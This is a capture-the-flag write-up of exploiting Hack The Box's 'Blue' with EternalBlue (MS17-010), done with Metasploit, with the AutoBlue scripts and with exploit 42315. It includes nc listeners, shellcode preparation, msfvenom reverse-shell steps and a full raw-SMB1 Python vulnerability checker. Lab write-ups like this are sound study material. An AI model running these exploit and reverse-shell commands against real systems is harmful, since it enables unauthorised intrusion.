This is my attempt at a walkthrough of HTB's Blue:
Autorecon:
Autorecon-445:
Looking at the scanned ports, 135 and 139 didn't turn up anything valuable.
But port 445 has a lot of information and points to a possible vulnerability:
The scan flags "ms17-010", the SMBv1 vulnerability better known as "EternalBlue".
Let's try Metasploit and see what happens.
Metasploit:
Looks like EternalBlue worked in Metasploit and we're in:
Privilege Escalation:
User Flag:
Now that we're in, I want to see if I can find the user flag:
Looks like I found the user flag.
Root Flag:
Now I want to see if I can find the root flag.
Going through a few directories, I think I saw an Administrator directory:
And yes, sure enough there is an "Administrator" directory.
Exploit EternalBlue Manually:
Since I'm practicing for the OSCP, I need to learn how to exploit machines without always having Metasploit available.
I found this script:
https://github.com/3ndG4me/AutoBlue-MS17-010
Check if the target is vulnerable (assuming I didn't have AutoRecon):
python eternal_checker.py <target ip>
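To show what a checker like eternal_checker.py is actually doing on the wire, here is a minimal MS17-010 check written for this walkthrough; it is an added example, not the AutoBlue script and not code from the original post. It speaks raw SMB1: negotiate, anonymous (null) session setup, tree connect to IPC$, then a Trans2 request whose subcommand is SESSION_SETUP (0x0E). An unpatched host answers that request with STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched host answers STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE. The target IP comes from the command line; the flags, buffer sizes and the 12 NUL data bytes are my own choices (they follow the common checkers but are not taken from the page).

```python
"""Minimal MS17-010 (EternalBlue) check over raw SMB1.

Added example for the walkthrough; not the AutoBlue eternal_checker.py.
Usage: python ms17_010_check.py <target ip>
"""
import socket
import struct
import sys

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched: the Trans2 SESSION_SETUP probe "succeeds"
STATUS_ACCESS_DENIED = 0xC0000022            # patched
STATUS_INVALID_HANDLE = 0xC0000008           # patched

SMB_COM_NEGOTIATE, SMB_COM_SESSION_SETUP, SMB_COM_TREE_CONNECT, SMB_COM_TRANS2 = 0x72, 0x73, 0x75, 0x32


def smb_header(command, status=0, tid=0, uid=0, mid=1):
    """32-byte SMB1 header: flags 0x18, flags2 = NT status codes + long names (no Unicode)."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, status, 0x18, 0x4001,
                       0, b"\x00" * 8, 0, tid, 0xFEFF, uid, mid)


def parse_header(pkt):
    """Return (command, ntstatus, tid, uid) from a raw SMB1 message."""
    if len(pkt) < 32 or pkt[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    command, status = struct.unpack_from("<BI", pkt, 4)
    tid = struct.unpack_from("<H", pkt, 24)[0]
    uid = struct.unpack_from("<H", pkt, 28)[0]
    return command, status, tid, uid


def negotiate_request():
    """Offer only the NT LM 0.12 dialect (SMB1); no extended security requested."""
    dialects = b"\x02NT LM 0.12\x00"
    return smb_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(dialects)) + dialects


def session_setup_request():
    """Anonymous (null) session: one NUL OEM password, empty user, domain, OS and LanMan strings."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFFF, 2, 1, 0, 1, 0, 0, 0x50)
    data = b"\x00" * 5
    return smb_header(SMB_COM_SESSION_SETUP) + struct.pack("<B", 13) + words + struct.pack("<H", len(data)) + data


def tree_connect_request(uid, host):
    """Connect to \\\\host\\IPC$ with a one-byte NUL password and service type '?????'."""
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    return smb_header(SMB_COM_TREE_CONNECT, uid=uid) + struct.pack("<B", 4) + words + struct.pack("<H", len(data)) + data


def trans2_session_setup_request(tid, uid):
    """Trans2 with Setup[0] = 0x000E (SESSION_SETUP) and 12 NUL data bytes (the probe)."""
    data = b"\x00" * 12
    offset = 32 + 1 + 30 + 2  # header + WordCount byte + 15 words + ByteCount
    words = struct.pack("<HHHHBBHIHHHHHBBH", 0, len(data), 0xFF, 0xFFFF, 0, 0, 0, 0,
                        0, 0, offset, len(data), offset, 1, 0, 0x000E)
    return smb_header(SMB_COM_TRANS2, tid=tid, uid=uid) + struct.pack("<B", 15) + words + struct.pack("<H", len(data)) + data


def classify(ntstatus):
    if ntstatus == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if ntstatus in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "PATCHED"
    return "UNKNOWN"


def _recvn(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed")
        buf += chunk
    return buf


def exchange(sock, smb_pkt):
    """Wrap in a NetBIOS session header (type 0x00 + 24-bit length), send, return the raw SMB reply."""
    sock.sendall(b"\x00" + struct.pack(">I", len(smb_pkt))[1:] + smb_pkt)
    length = struct.unpack(">I", b"\x00" + _recvn(sock, 4)[1:])[0]
    return _recvn(sock, length)


def check_host(host, port=445, timeout=5):
    """Run the four-step exchange and return (ntstatus, verdict) for the Trans2 probe."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        _, status, _, _ = parse_header(exchange(sock, negotiate_request()))
        if status:
            raise RuntimeError("negotiate failed: 0x%08X" % status)
        _, status, _, uid = parse_header(exchange(sock, session_setup_request()))
        if status:
            raise RuntimeError("null session rejected: 0x%08X" % status)
        _, status, tid, _ = parse_header(exchange(sock, tree_connect_request(uid, host)))
        if status:
            raise RuntimeError("IPC$ tree connect failed: 0x%08X" % status)
        _, status, _, _ = parse_header(exchange(sock, trans2_session_setup_request(tid, uid)))
        return status, classify(status)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: %s <target ip>" % sys.argv[0])
    ntstatus, verdict = check_host(sys.argv[1])
    print("%s: NTSTATUS 0x%08X -> %s" % (sys.argv[1], ntstatus, verdict))
```

The check needs a null session and an IPC$ tree connect to work; if either step is refused the script raises rather than guessing, because a refusal there says nothing about the patch state. It is also only a vulnerability check, not an exploit: it never touches the kernel pool, so it is safe to run against a production box.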
Create a shell:
cd shellcode
./shell_prep.sh
Start a listener for each port given to shell_prep.sh (one for the x64 payload, one for the x86 payload):
nc -lvp 4444
nc -lvp 5555
Let's exploit. From the shellcode directory, go back up to the AutoBlue-MS17-010 root and run the exploit there.
I will use eternalblue_exploit7.py:
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
It failed: no shell in my listener.
I'm going to try creating a new shell since this one is failing.
cd shellcode
rm sc*
ls
Create the new shell:
cd shellcode
./shell_prep.sh
Start new listeners:
Okay, so I ran the exploit twice with no shell. I'm going to try to find a different exploit.
New Exploit:
Using searchsploit:
searchsploit --id MS17-010
I'm working with Windows 7, so we'll use exploit 42315, which targets Windows 7/2008 R2. Copy the exploit into the working directory:
searchsploit -m 42315
After looking at the source code, I need to do three things:
- Download mysmb.py since the exploit imports it. The download location is included in the exploit.
- Use msfvenom to create a reverse shell payload (allowed on the OSCP as long as you're not using Meterpreter).
- Edit the exploit to add the authentication credentials and the reverse shell payload.
First, download the file. It is served under the name 42315.py, and that name is already taken by the exploit, so wget saves it as 42315.py.1; rename it to mysmb.py:
mv 42315.py.1 mysmb.py